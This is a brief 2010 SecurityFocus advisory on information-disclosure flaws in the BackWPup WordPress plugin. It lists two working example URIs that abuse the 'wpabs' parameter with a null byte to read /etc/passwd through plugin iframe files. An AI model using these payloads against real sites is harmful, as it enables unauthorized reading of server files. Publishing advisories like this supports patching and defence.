BackWPup Plugin for WordPress Multiple Information Disclosure Vulnerabilities

Attackers can exploit these issues with a web browser.

The following example URIs are available:

http://www.example.com/wp-content/plugins/backwpup/app/options-runnow-iframe.php?wpabs=/etc/passwd%00&jobid=1

http://www.example.com/wp-content/plugins/backwpup/app/options-view_log-iframe.php?wpabs=/etc/passwd%00&logfile=/etc/passwd


 

Privacy Statement
Copyright 2010, SecurityFocus